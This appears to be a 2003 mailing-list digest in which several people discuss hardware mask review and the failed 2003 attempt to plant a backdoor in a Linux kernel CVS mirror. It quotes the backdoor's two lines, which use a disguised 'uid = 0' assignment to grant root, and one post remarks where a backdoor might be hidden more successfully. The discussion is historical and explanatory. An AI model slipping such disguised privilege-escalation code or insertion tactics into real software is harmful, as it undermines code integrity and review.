----- Forwarded message from kaze no tani no potsicaa <> -----
Date: Thu, 13 Nov 2003 19:39:38 -0500
Subject: [s-t] the thompson gambit digest #1
Re: needle in haystack digest #3
from Robert Walsh <[EMAIL PROTECTED]>
and Nick Barnes <[EMAIL PROTECTED]>
Re: How a backdoor in the Linux kernel was thwarted (fwd)
from V Layne <[EMAIL PROTECTED]>
Re: How a backdoor in the Linux kernel was thwarted (fwd)
from Oliver Xymoron <[EMAIL PROTECTED]>
Re: How a backdoor in the Linux kernel was thwarted (fwd)
from Jamie McCarthy <[EMAIL PROTECTED]>
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Subject: Re: [s-t] needle in haystack digest #3
From: Robert Walsh <[EMAIL PROTECTED]>
Date: Thu, 06 Nov 2003 09:51:14 -0800
> Yes. I wasn't intending to suggest an attack based solely on masks.
Yes - it'd never work. Electronic Engineers are a strange bunch. I've
spent way too much of my time in a room full of people staring at mask
plots of various 50M transistor and up CPUS looking for flaws, areas for
optimization, etc. It's part of every CPU design cycle and the
developers hate it, but it has to be done. If the mask doesn't match
the circuit you designed, you can spot that kind of thing fairly
quickly. If it didn't match in a way that actually did something
useful, then it'd leap right out at you as soon as you unfurled the
plot.
It's not just at the design review stage, either. The fab people are
constantly processing the chip design, performing their own reviews,
staring through microscopes at the wafers: working on alignment issues,
probing test points, stripping layers and taking cross-sections to
examine everything from VIA quality to metalization issues. Something
out of the ordinary would make itself obvious pretty quickly.
These people live inside their chips. That's why they sort of work.
Regards,
Robert.
--=20
Robert Walsh
Amalgamated Durables, Inc. - "We don't make the things you buy."
Email: [EMAIL PROTECTED]
-----------------------------------------------------------
From: Nick Barnes <[EMAIL PROTECTED]>
Subject: Re: [s-t] needle in haystack digest #3
Date: Fri, 07 Nov 2003 15:00:37 +0000
At 2003-11-06 17:51:14+0000, Robert Walsh writes:
> > Yes. I wasn't intending to suggest an attack based solely on masks.
>
> Yes - it'd never work.
I'm sure you're right. It was a fun strawman to build, though.
Nick B
-----------------------------------------------------------
From: V Layne <[EMAIL PROTECTED]>
Subject: Re: [s-t] How a backdoor in the Linux kernel was thwarted (fwd)
Date: Wed, 12 Nov 2003 20:08:04 -0500
> Forwarded around quite a bit - I thought I'd pass it on and maybe some of
> the more Linux-involved s-t'ers can confirm or deny the story. I didn't
> see it on /.,
Linux Kernel Back-Door Hack Attempt Discovered
[Linux] [Software]
Posted by simoniker on 12:37 AM November 6th, 2003
from the intrigue-and-skullduggery dept.
http://slashdot.org/article.pl?sid=03/11/06/058249&mode=thread&tid=106&tid=18
5
-----------------------------------------------------------
Date: Wed, 12 Nov 2003 22:10:42 -0600
From: Oliver Xymoron <[EMAIL PROTECTED]>
Subject: Re: [s-t] How a backdoor in the Linux kernel was thwarted (fwd)
On Wed, Nov 12, 2003 at 02:55:05PM -0800, Spastic Mutant wrote:
>
> Someone broke into a server at kernel.kbits.net and inserted the following
> code into the Linux kernel:
>
> if ((options == (__WCLONE|__WALL)) && (current->uid = 0))
> retval = -EINVAL;
More precisely into the CVS mirror of the Linux kernel, which is
primarily maintained with BitKeeper. This copy of the tree is
unauthoritative, the only authoritative copy sits on Linus' personal
machine. Thus for this copy to get merged into Linux proper, someone would
have to pull a copy from CVS, generate a patch containing the bogus
code, and then ship it off to Linus. Linus would then have to
completely fail to notice the meaningless code in an unrelated patch
and apply it. As the kernel is currently in deep freeze, possibly
weeks away from release, this is a rather unlikely scenario.
More importantly, this is a mirror, and immediately broke on the next
mirror update, and updates happen multiple times a day.
> This was done in the code sys_wait4(). Larry McVoy caught the fact that
the
> change had been made, and was annoyed because it wasn't logged properly.
> Matthew Dharm asked "Out of curiosity, what were the changed lines." Zwane
> Mwaikambo responded "That looks odd", and Andries Brouwer responded "Not if
> you hope to get root."
>
> So, an annoying violation of the software change logging requirements
turned
> out to be an attempt to install a backdoor in Linux. At least two very
> experienced programmers looked at it and saw just slightly odd code, before
> the serious nature of the threat was actually discovered.
Except Zwane in fact knew exactly what the code was doing when he
commented on its oddness and had to suffer dozens of people writing to
explain the code to him.
> This particular attack, by the way, is ruled out by the current voting
> system standards, not because they require a comprehensive security
> analysis, but because of their C-centered coding rules. Embedded
assignment
> is forbidden. Current source code checks are good at finding embedded
> assignments and flagging them (as long as the code is written in C). No
> doubt, a hacker of the sophistication suggested by the attack illustrated
> above would strictly adhere to the coding guidelines in formulating their
> attack.
There was very little sophistication in this attack.
a) It attacked a secondary repository with no likely method of getting
fed into the core
b) It got noticed as corruption by the automatic update tools immediately
c) The patch itself created unreachable code which current compilers
will warn you about
d) And it wasn't particularly subtle by kernel standards
We haven't heard how the attack was planted yet, but I'm expecting
we'll hear it was done with script-kiddie tools.
If you want to get a backdoor in the kernel, a more likely approach is
to stick it in some poorly audited peripheral code and submit it when
there's not a code freeze on. Even then, odds are heavily against you.
--
"Love the dolphins," she advised him. "Write by W.A.S.T.E.."
-----------------------------------------------------------
Date: Thu, 13 Nov 2003 09:45:44 -0500
From: Jamie McCarthy <[EMAIL PROTECTED]>
Subject: Re: [s-t] How a backdoor in the Linux kernel was thwarted (fwd)
[EMAIL PROTECTED] (Spastic Mutant) writes:
> Someone broke into a server at kernel.kbits.net and inserted
> the following code into the Linux kernel:
The code was inserted into a CVS mirror of the kernel. The kernel
itself is stored and updated in BitKeeper, primarily on a machine of
Linus's, and then copied to a public BitKeeper archive, and from
there to the CVS mirror. Neither BitKeeper machine was not broken
into and their code was not changed. So it's arguable whether the
change, which was caught within 24 hours, constituted changing the
Linux kernel. I would argue no.
http://slashdot.org/article.pl?sid=03/11/06/058249
and I'm told that this coverage is good, but you and I aren't able
to read it for a week :) http://lwn.net/Articles/57135/
--
Jamie McCarthy
http://mccarthy.vg/
[EMAIL PROTECTED]
-----------------------------------------------------------
----- End forwarded message -----
-- Eugen* Leitl <a href="http://leitl.org";>leitl</a>
______________________________________________________________
ICBM: 48.07078, 11.61144 http://www.leitl.org
8B29F6BE: 099D 78BA 2FD3 B014 B08A 7779 75B0 2443 8B29 F6BE
[demime 0.97c removed an attachment of type application/pgp-signature]
